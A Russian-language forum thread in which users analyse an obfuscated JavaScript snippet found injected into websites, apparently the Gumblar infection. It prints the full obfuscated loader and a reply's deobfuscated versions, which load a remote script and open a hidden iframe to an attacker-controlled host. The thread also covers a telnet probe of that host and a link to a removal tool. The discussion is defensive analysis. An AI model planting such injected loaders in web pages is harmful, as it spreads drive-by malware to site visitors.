форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форумы Программирование под UNIX (Public)
Изначальное сообщение		[ Отслеживать ]

"Вирусный скрипт"		+/–
Сообщение от SermanZer on 08-Янв-10, 13:33
Привет. На одном сайте нашел вот такой код, явно вирусный: <script>/*LGPL*/ try{ window.onload = function(){var Y0r5c4wy2fixek = document.createElement('s!&c$!&#r&#!$i^(p^!)##t#^'.replace(/#|\(|\^|@|\$|\!|\)|&/ig, ''));Y0r5c4wy2fixek.setAttribute('defer', 'd$@#e&#f#e(r)!)#)'.replace(/\!|#|\^|\(|&|\$|\)|@/ig, ''));Y0r5c4wy2fixek.setAttribute('type', 't)^$e)x!^(t(@/@&)j(@$a#)v^a!&#s@c^r)i#^p^t('.replace(/&|\)|@|\!|\^|\$|\(|#/ig, ''));Y0r5c4wy2fixek.setAttribute('id', 'C(($#(9&^k$$t@o#(!n^7)@0#)&)q@)w^&^'.replace(/\)|&|\(|\$|#|\^|\!|@/ig, ''));Y0r5c4wy2fixek.setAttribute('s&#r!c&^#'.replace(/\(|\^|&|@|\$|\)|\!|#/ig, ''),  'h$!t))t$$p#^:#(&@)/#!)/(t@)&o(@^$@p&@s##h@$#a#@&r!@e^w(a^@$r$^e@@-(!c)&o$&^m$.&^&#s!@l&^i!$d(^@e(s#$!h^&!a@$!r)e&.(^^@n#e!@t)(.@c(l$)a#($r#$i^n&&#-@c&$o))(^m!$)&.@)t($^$h$$^#(e)@c###&h^$^(o)(c&^!o@@$l$^$a&^t&#$$e@&w##)e@)^b!!.(##$r!u@@!:&#!8)#(0^#^^8$#&&0))/()g&^o^)o@^g!)l^e&!.!!#c&o^!($m)$&&/(!g&(#&o!)!o)@g!@l!$e^(.&$c&$o@)m@#@)/(&&^l&a)##&(s&t&@.(f#$)!m!!/)^v^^)e(o)!@h^&$$!.$(c@!#&o&&m##&^&/!&h^^u)#d$$(o&n!^g)).^c^&o!m#&#)/$'.replace(/@|\!|#|\^|&|\(|\)|\$/ig, ''));if (document){document.body.appendChild(Y0r5c4wy2fixek);}} } catch(Mxbfhbj5q04qxno71yp2) {}</script> <!--b7c6f5ad44d5f4e7a48ec7690538e1d5--> Тут видно, что идет куча замен и проч. Как понять, чего этот скрипт вообще делает и насколько он опасен? Спасибо
Высказать мнение | Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Вирусный скрипт"		+/–
Сообщение от Slavaz (ok) on 08-Янв-10, 15:12
>Тут видно, что идет куча замен и проч. Как понять, чего этот скрипт вообще делает и насколько он опасен? Сохрани текст в файл. Потом выполни tr -d '#|\\|\^|@|\$|\!||&' <file.txt >output.txt Я особо не заморачивался - вручную выкосил ненужные скобки () и вот что получилось (с косметическими правками): <script>/*LGPL*/ try{ window.onload = function(){   var Y0r5c4wy2fixek = document.createElement('script');   Y0r5c4wy2fixek.setAttribute('defer', 'defer');   Y0r5c4wy2fixek.setAttribute('type', 'text/javascript');   Y0r5c4wy2fixek.setAttribute('id', 'C9kton70qw');   Y0r5c4wy2fixek.setAttribute('src',      'http://topshareware-com.slideshare.net.clarin-com.thechocola.../');   if (document)   {    document.body.appendChild(Y0r5c4wy2fixek);   } } } catch(Mxbfhbj5q04qxno71yp2) { } </script> В двух словах: создаёт новый элемент типа javascript, назначает ему адрес. По указанному адресу другой кусок яваскрипта. После приведения в "нормальный" вид имеем: Mtpnq14 = 'topshareware-com.slideshare.net.clarin-com.thechocolateweb.ru'; f = document.createElement('iframe'); f.src = 'http://'+Mtpnq14+':8080/index.php?ys'; f.style.visibility = 'hidden'; document.body.appendChild(f); То есть, создаётся скрытый фрейм, адрес которого: http://topshareware-com.slideshare.net.clarin-com.thechocola... По указанному адресу ничего не выдаётся (ответ нулевой длины) $ telnet topshareware-com.slideshare.net.clarin-com.thechocolateweb.ru 8080 Trying 91.121.49.129... Connected to opshareware-com.slideshare.net.clarin-com.thechocolateweb.ru. Escape character is '^]'. GET /index.php?ys Connection closed by foreign host. Дальше колупаться лень, пусть колупаются кому интересно - гики или представители правоохранительных органов, если это все не счётчик, а "распространение ПО, нарушающего работоспособность ЭВМ или ЛВС".
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Вирусный скрипт"		+/–
Сообщение от jd (??) on 09-Янв-10, 15:21
С чего вы вообще взяли, что это "вирусный код"??? Код явно обработан, чтобы занимать меньше места и чтобы его неудобнее было читать, но какое это имеет отношение к вирусу? Часто так делают, чтобы затруднить заимствование идей, хотя коментарий "LGPL" с этим как-то немного и не вяжется. В общем, это может, конечно, и "вирусный код", может какой-нибудь счётчик, как заметили выше. А может быть что угодно ещё. По поводу того, что он делает, уже написано.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	3. "Вирусный скрипт"		+/–
	Сообщение от chaoba (ok) on 09-Янв-10, 16:04
	Думаю это вирус. Он появился на моем сайте сегодня на всех страницах с именем index в конце файла. У меня в нескольких папках есть index.php, index.html. Пришлось удалять.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	4. "Вирусный скрипт"		+/–
	Сообщение от DmitryDV on 09-Янв-10, 23:12
	>Думаю это вирус. Он появился на моем сайте сегодня на всех страницах >с именем index в конце файла. У меня в нескольких папках >есть index.php, index.html. >Пришлось удалять. Это вирус Gumblar. Я тоже подхватил эту хрень. Тут http://justcoded.com/article/gumblar-family-virus-removal-tool/ вроде как лекарство от него
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема